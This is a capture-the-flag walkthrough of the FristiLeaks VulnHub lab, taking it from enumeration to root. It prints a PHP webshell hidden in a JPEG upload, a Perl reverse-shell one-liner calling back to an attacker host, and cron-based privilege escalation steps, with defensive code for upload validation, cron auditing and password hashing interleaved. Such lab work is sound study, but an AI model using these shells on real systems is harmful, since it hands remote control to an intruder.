URL: https://www.vulnhub.com/entry/fristileaks-13,133/

Intro

Today I am hacking FristiLeaks, a VulnHub machine named after the informal Dutch hackers group of the same name. I’ll start with enumerating the web service and abusing it to upload a webshell and then a reverse shell, then I am going to utilise a cron-executed script and Perl to escalate privileges both horizontally and vertically. Ultimately, I will decode the root’s password and pwn the target.

Enumeration

Nmap

I kicked off the reconnaissance with a basic Nmap scan to identify open ports and services on the target:

nmap -sV target.local -oN nmap.txt -vv
# ...
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)

The scan revealed that only port 80 was open, running an Apache httpd server.

Meanwhile I ran a full port scan (-p-) and a UDP (-sU) scan to see if there were any other open ports. These didn’t yield any results though.

Port 80

Visiting http://target.local showed a webpage containing a link to x.com/tags/fristileaks and an image. There was nothing of interest here. Additionally I checked the webpage’s source code, again, to no avail.

Screenshot 2024-01-23 at 17.43.57

To explore potential paths, I ran a gobuster scan against the HTTP server, using the dirb/big.txt wordlist.

gobuster dir -u target.local -w /usr/share/wordlists/dirb/big.txt
# ...
/.hta                 (Status: 403) [Size: 206]
/.htaccess            (Status: 403) [Size: 211]
/.htpasswd            (Status: 403) [Size: 211]
/cgi-bin/             (Status: 403) [Size: 210]
/images               (Status: 301) [Size: 235] [--> http://target.local/images/]
/index.html           (Status: 200) [Size: 703]
/robots.txt           (Status: 200) [Size: 62]

The /images directory listed two files, one of which was basically making fun of me upfront.

Screenshot 2024-01-23 at 17.51.25

Interestingly, exploring /robots.txt revealed hidden paths such as /beer, /cola, and /sisi, each displaying the same image above.

Attempting to find hidden directories using gobuster on the paths found in robots.txt did not prove useful either.

💡 Meanwhile the full Nmap scan finished and revealed port 28928 open, however I didn’t know what to do about it at the time.

nmap -sT target.local -p-
# ...
PORT      STATE SERVICE VERSION
28928/tcp open  unknown syn-ack

Ultimately I ran another gobuster scan, using rockyou.txt as a wordlist this time.

gobuster dir -u target.local -w ~/Desktop/rockyou.txt

/fristi               (Status: 301) [Size: 235] [--> http://target.local/fristi/]

💡 Be curious

Out of curiosity I googled what fristi means and… well, it’s a drink.

Remember the drink fristi advice from the homepage? Pretty effin’ obvious.

Anyways, upon exploring /fristi, a Login Form was discovered.

Screenshot 2024-01-23 at 21.48.39

Exploitation

Inspecting the form’s source code exposed a commented-out, base64-encoded image. Might be useful later.

Screenshot 2024-01-23 at 21.53.11

The Login Form itself made a POST request to checklogin.php upon submitting. Although I attempted SQL injection, it proved fruitless.

However, further examination of the source code revealed something that looked like a login:

<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->

Combining the name from the comment with the decoded image, I found the valid credentials: eezeepz:keKkeKKeKKeKkEkkEk.

Logging in allowed the uploading of files, with images being the only accepted format:

Screenshot 2024-01-23 at 22.04.46

Uploading the download.png image resulted in the image being saved at http://target.local/fristi/uploads/download.png:

Screenshot 2024-01-23 at 22.05.25

Noice.

Webshell

At this point I wanted to upload a webshell. The issue was the only valid files were images, so I had to embed the PHP code somehow.

Using jhead I modified the JPEG’s metadata to include a PHP webshell:

<?php
echo "Hello, world";
$cmd = $_GET['cmd'];   // command taken from the query string

echo "<pre>";
system($cmd);          // run it and return the output in the response
echo "</pre>";

I saved it as shell.php.jpg and, after uploading, it permitted executing commands:

http://target.local/fristi/uploads/shell.php.jpg?cmd=ls

Screenshot 2024-01-23 at 22.51.09

This provided access to the web server with the user apache.
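What made this work is that the upload check trusted the file name and the final extension only, while Apache’s mod_mime treats every extension in a name, so a “.php” anywhere in shell.php.jpg reaches the PHP handler, and the PHP itself sat in a JPEG comment segment where no extension check can see it. The validator below is an added example (not the box’s upload code, which the page does not show) of the three checks that would each have stopped this: exactly one extension, extension matched against magic bytes, and a scan of the bytes for PHP open tags. The sample images are constructed inline.

```python
import os
import re
import secrets
from typing import Optional, Tuple

# Image types we accept, recognised by their leading bytes, never by the name the client sent.
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# PHP open tags. Legitimate image metadata (EXIF, XMP's "<?xpacket") never contains these.
PHP_MARKERS = re.compile(rb"<\?php|<\?=|<\?\s", re.IGNORECASE)


def sniff_type(data: bytes) -> Optional[str]:
    """Identify the image format from its magic bytes, or None if it is not one we accept."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason).

    Three independent checks, each of which would have rejected shell.php.jpg:
      1. exactly one extension, so multi-extension handling can never see ".php";
      2. the extension must agree with the sniffed content type;
      3. the bytes must not carry a PHP open tag anywhere (comment segments included).
    """
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "filename must be name.ext with exactly one extension"
    ext = "jpg" if parts[1] == "jpeg" else parts[1]
    kind = sniff_type(data)
    if kind is None:
        return False, "content is not a recognised image format"
    if kind != ext:
        return False, f"extension .{ext} does not match content type {kind}"
    if PHP_MARKERS.search(data):
        return False, "image bytes contain a PHP open tag"
    return True, kind


def stored_name(kind: str) -> str:
    """Name the file ourselves: random, one safe extension, nothing derived from the client."""
    return f"{secrets.token_hex(16)}.{kind}"


# Constructed samples (not files from the box): a minimal JPEG, a JPEG whose COM (0xFFFE)
# segment carries a PHP tag the way a comment-editing tool would store it, and a minimal PNG.
JPEG_CLEAN = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + b"\xff\xd9"
_comment = b"<?php echo 'marker'; ?>"
JPEG_WITH_PHP = b"\xff\xd8\xff\xfe" + (len(_comment) + 2).to_bytes(2, "big") + _comment + b"\xff\xd9"
PNG_CLEAN = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR" + bytes(17)

if __name__ == "__main__":
    for name, blob in [("download.png", PNG_CLEAN), ("shell.php.jpg", JPEG_CLEAN),
                       ("holiday.jpg", JPEG_WITH_PHP), ("holiday.jpg", PNG_CLEAN)]:
        print(name, validate_upload(name, blob))
```

Beyond validation, the uploads directory should be served with no script handler at all (or live outside the document root), so that even a file that slips through is returned as bytes rather than executed.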

❗ I will use code-block instead of screenshots from now on.

# webshell
id

uid=48(apache) gid=48(apache) groups=48(apache)

Revshell

After confirming the vulnerability, I spawned a nc listener on port 2345 and upgraded the webshell into a reverse shell using php-reverse-shell.php:

# webshell -> revshell
nc -lvp 2345
listening on [any] 2345 ...
# ...
sh-4.1$ id

uid=48(apache) gid=48(apache) groups=48(apache)

With a stable shell, I spawned a proper PTY using python:

python -c 'import pty; pty.spawn("/bin/bash")'

Now onto the privilege escalation.

Priv Esc to admin

Exploring the /home directory revealed users admin, eezeepz, and fristigod.

# revshell
ls /home

admin
eezeepz
fristigod

Investigating /home/eezeepz, apart from a list of binaries, an interesting note was revealed.

# revshell
ls -l | grep notes
# ...
-r--r--r--. 1 eezeepz eezeepz    514 Nov 18  2015 notes.txt
cat notes.txt

Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

- Jerry

The note indicated restricted access but offered additional commands available from /home/admin.

/tmp/runthis

Dropping a test /tmp/runthis script confirmed that its commands were executed and the results stored in /tmp/cronresult:

# /tmp/runthis
#!/bin/sh
/usr/bin/id

# a minute later, on the revshell
cat /tmp/cronresult

executing: /usr/bin/id
uid=501(admin) gid=501(admin) groups=501(admin)

The script was executing the commands using the admin account, so I tried to spawn another reverse shell, this time as admin.

I compared the binaries available in /usr/bin against GTFOBins and found perl on both lists:

# /tmp/runthis

#!/bin/bash
/usr/bin/perl -e 'use Socket;$i="KALI_IP";$p=2346;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# kali

nc -lvp 2346
# revshell
id

uid=501(admin) gid=501(admin) groups=501(admin)

Perfect.
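The root cause here is a privileged cron job that takes its instructions from /tmp, a directory every user can create files in. The audit below is an added example (not the box’s cronjob.py, whose contents the page does not show): given a script a cron job runs, it flags the script itself if others can write it, and every absolute path it references that a non-owner could write to or create. The fixture it audits is constructed in a temporary directory, with a sticky world-writable subdirectory standing in for /tmp.

```python
import os
import re
import stat
import tempfile
from typing import Dict, List

# Absolute paths as they appear in shell or Python source, e.g. "/home/admin/cat", "/tmp/runthis".
ABS_PATH = re.compile(r"(?<![\w/.])/(?:[\w.-]+/)*[\w.-]+")


def writable_by_others(path: str) -> bool:
    """True when someone other than the owner could supply the file's content.

    Existing path: group or other write bit set.
    Missing path: anyone can create it if the parent directory is world-writable
    (the /tmp/runthis case: whoever writes the file first gets their lines executed).
    """
    try:
        st = os.stat(path)
    except FileNotFoundError:
        parent = os.path.dirname(path) or "/"
        try:
            return bool(os.stat(parent).st_mode & stat.S_IWOTH)
        except FileNotFoundError:
            return False
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def risky_paths(script_text: str) -> List[str]:
    """Absolute paths referenced by a script that a non-owner could write to or create."""
    return [p for p in sorted(set(ABS_PATH.findall(script_text))) if writable_by_others(p)]


def audit_cron_script(script_path: str) -> Dict[str, object]:
    """Audit one script run by a privileged cron job: its own permissions and its inputs."""
    with open(script_path) as f:
        text = f.read()
    return {
        "script_writable_by_others": writable_by_others(script_path),
        "risky_inputs": risky_paths(text),
    }


def demo() -> Dict[str, bool]:
    """Build a constructed fixture in a temp dir and audit it; no real system paths are touched."""
    root = tempfile.mkdtemp(prefix="cronaudit-")
    drop = os.path.join(root, "drop")          # stands in for /tmp: sticky, world-writable
    os.mkdir(drop)
    os.chmod(drop, 0o1777)
    secure = os.path.join(root, "secure.sh")   # owner-writable only
    loose = os.path.join(root, "loose.sh")     # mode 666: anybody can edit it
    for p, mode in ((secure, 0o644), (loose, 0o666)):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, mode)
    # The audited job, modelled on the note: it runs each line of a file in the drop directory.
    job = os.path.join(root, "cronjob.py")
    with open(job, "w") as f:
        f.write(f"#!/usr/bin/python\nfor line in open('{drop}/runthis'):\n    pass\n"
                f"# also calls {secure} and {loose}\n")
    os.chmod(job, 0o700)
    result = audit_cron_script(job)
    flagged = result["risky_inputs"]
    return {
        "script_writable_by_others": bool(result["script_writable_by_others"]),
        "flagged_missing_in_drop": f"{drop}/runthis" in flagged,
        "flagged_loose": loose in flagged,
        "flagged_secure": secure in flagged,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The fix on the defending side is the mirror of the finding: a job running as admin should read only from locations that admin alone can write, and the script it runs should be owner-writable only.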

Priv Esc to root

I listed files inside /home/admin and the whoisyourgodnow.txt looked interesting.

ls

cat
chmod
cronjob.py
cryptedpass.txt
cryptpass.py
df
echo
egrep
grep
ps
whoisyourgodnow.txt

The contents seemed to be base64-encoded, but decoding it as is didn’t actually work.

Then I checked the cryptpass.py file and saw that it encoded the given string with base64, reversed the result and then applied rot13:

python cryptpass.py "this is a test"

=D3pyEUVuOlpcOlpcuTq

Knowing that, I’ve prepared a quick decryption recipe in CyberChef:

Screenshot 2024-01-24 at 11.25.12

This way I decoded whoisyourgodnow.txt:

LetThereBeFristi!

and then, cryptedpass.txt:

thisisalsopw123
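The scheme is reversible with no key, which is why CyberChef recovers the plaintext in one pass. As an added example (not the box’s cryptpass.py, only a reimplementation of the three steps the page describes) the block below encodes and decodes with the same recipe, checked against the page’s own sample output, and contrasts it with what a stored credential should look like: a salted PBKDF2 hash that can be verified but never decoded.

```python
import base64
import codecs
import hashlib
import hmac
import os


def cryptpass_encode(plain: str) -> str:
    """The three steps the page describes for cryptpass.py: base64, reverse the string, rot13."""
    b64 = base64.b64encode(plain.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot_13")


def cryptpass_decode(token: str) -> str:
    """Undo the steps in reverse order. rot13 is its own inverse, so the whole scheme needs
    no secret: anyone who can read the file and the script recovers the plaintext."""
    return base64.b64decode(codecs.decode(token, "rot_13")[::-1]).decode("utf-8")


# Contrast: a salted, slow one-way hash. There is nothing to "decode"; only verification is possible.
PBKDF2_ROUNDS = 600_000


def store_password(plain: str) -> str:
    """Return a self-describing record: algorithm, rounds, hex salt, hex digest."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", plain.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${digest.hex()}"


def verify_password(plain: str, stored: str) -> bool:
    """Recompute with the stored salt and rounds; compare in constant time."""
    _, rounds, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", plain.encode("utf-8"), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    token = cryptpass_encode("this is a test")
    print(token, "->", cryptpass_decode(token))
    record = store_password("this is a test")
    print(record, verify_password("this is a test", record))
```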

Now, I tried sudo -l to see what commands admin might have access to.

sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for admin: thisisalsopw123

Sorry, user admin may not run sudo on localhost.
[admin@localhost ~]$

This didn’t prove useful though. But hey, it’s perfectly normal to have an admin account that cannot do a thing, right?

A short while after, using ls -l, I learned that the whoisyourgodnow.txt file belonged to none other than fristigod. Why shouldn’t I try to log in as him?

su -l fristigod
Password: LetThereBeFristi!

-bash-4.1$ id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)

Hello, fristigod.

ls -a
.  ..  .bash_history  .secret_admin_stuff

cd .secret_admin_stuff
ls -l

total 8
-rwsr-sr-x 1 root root 7529 Nov 25  2015 doCom


./doCom
Nice try, but wrong user ;)

Well, at least I progressed a tiny little bit.

sudo -l

[sudo] password for fristigod: LetThereBeFristi!

Matching Defaults entries for fristigod on this host: requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

I’ve been staring at it for quite a while, but ultimately I noticed it.

The (fristi : ALL) Moment

I was stuck on fristigod as the username, and didn’t notice that fristi is another user, the one the rule allows doCom to be run as!

sudo -u fristi ./doCom /bin/bash
[sudo] password for fristigod: LetThereBeFristi!

bash-4.1#

Pwned

whoami
root

ls /root
fristileaks_secrets.txt


cat /root/fristileaks_secrets.txt

Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: <redacted>

Pwned.

Not sure about these 4 hours tho.